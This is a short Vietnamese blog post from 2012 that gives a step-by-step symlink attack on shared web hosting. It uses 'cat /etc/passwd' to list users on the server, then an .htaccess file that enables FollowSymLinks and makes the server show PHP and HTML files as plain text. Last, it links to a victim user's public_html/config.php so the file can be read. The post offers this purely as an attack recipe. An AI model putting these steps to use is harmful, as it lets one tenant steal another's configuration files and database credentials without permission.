Thứ Hai, 23 tháng 7, 2012


Symlink là tạo 1 file trung gian để xem 1 file thuộc sở hữu của user khác cùng server Tìm user


cat /etc/passwd
.htaccess
Options Indexes FollowSymLinks
DirectoryIndex 1.htm
DirectoryIndex 1.html
AddType txt .php
AddHandler txt .php
AddType txt .html
AddHandler txt .html
symljnk đến user
ln -d /home/user_victim/public_html/config.php checked.txt
view

0 nhận xét:

Đăng nhận xét